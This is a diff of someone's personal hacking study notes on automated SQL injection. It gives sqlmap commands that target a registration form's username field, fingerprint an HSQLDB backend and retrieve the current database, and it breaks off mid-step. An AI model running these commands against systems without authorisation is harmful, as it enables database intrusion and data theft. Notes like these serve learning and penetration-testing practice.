Anonymvs17/hacking/notes/web/sql.md

 `sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads 1`

 # Process for sql (automated)
-1) locate vuln field (check blind sql) or automated: `ssqlmap -r /home/kali/Documents/sqlInj2.raw --string "please try to register with a different username" --thread=1` dbms we get from this response
+1) locate vuln field (check blind sql) or automated (--string is the indicator for "success"): `sqlmap -r /home/kali/Documents/sqlInj2.raw --string "please try to register with a different username" --thread=1` dbms we get from this response

 2) get db from the vuln field: `sqlmap -r "/home/kali/Documents/sqlInj.raw" --string "please try to register with a different username" -p username_reg --threads 1 --dbms="HSQLDB" --current-db`
 reurns: